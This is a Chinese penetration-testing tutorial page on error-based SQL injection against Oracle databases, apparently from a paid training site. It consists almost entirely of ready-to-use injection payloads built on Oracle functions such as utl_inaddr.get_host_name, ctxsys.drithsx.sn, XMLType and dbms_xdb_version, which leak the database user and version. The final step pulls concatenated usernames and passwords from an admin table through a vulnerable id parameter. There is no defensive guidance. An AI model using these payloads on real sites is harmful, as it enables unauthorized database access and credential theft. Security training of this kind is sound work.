1. 首页
  2. 渗透测试

【原创】WEB安全第四章SQL注入篇18oracle 报错注入

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

WEB安全第四章SQL注入篇18oracle 报错注入

0x1 utl_inaddr.get_host_name()进行报错注入

and 1=utl_inaddr.get_host_name((select user from dual))–

http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select user from dual))–

0x2 ctxsys.drithsx.sn()进行报错注入

http://www.jsporcle.com/news.jsp?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual))–

0x3 XMLType()进行报错注入

and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null —

http://www.jsporcle.com/news.jsp?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null —

0x4  dbms_xdb_version.checkin()进行报错注入

and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null —

查询版本信息

http://www.jsporcle.com/news.jsp?id=1 and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null —

【原创】WEB安全第四章SQL注入篇18oracle 报错注入

0x5 bms_xdb_version.makeversioned()进报错注入

and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null —

0x6 dbms_xdb_version.uncheckout()进行报错注入

and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null —

0x7 dbms_utility.sqlid_to_sqlhash()进行报错注入

and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null —

0x8 ordsys.ord_dicom.getmappingxpath()进行报错注入

and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)–

0x9 decode进行报错注入,这种方式更偏向布尔型注入,因为这种方式并不会通过报错把查询结果回显回来,仅是用来作为页面的表现不同的判断方法。

and 1=(select decode(substr(user,1,1),’S’,(1/0),0) from dual) —

0x10报错admin表的 用户和密码

http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select (select username%7c%7cpassword from admin)from dual))–

【原创】WEB安全第四章SQL注入篇18oracle 报错注入

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/110.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息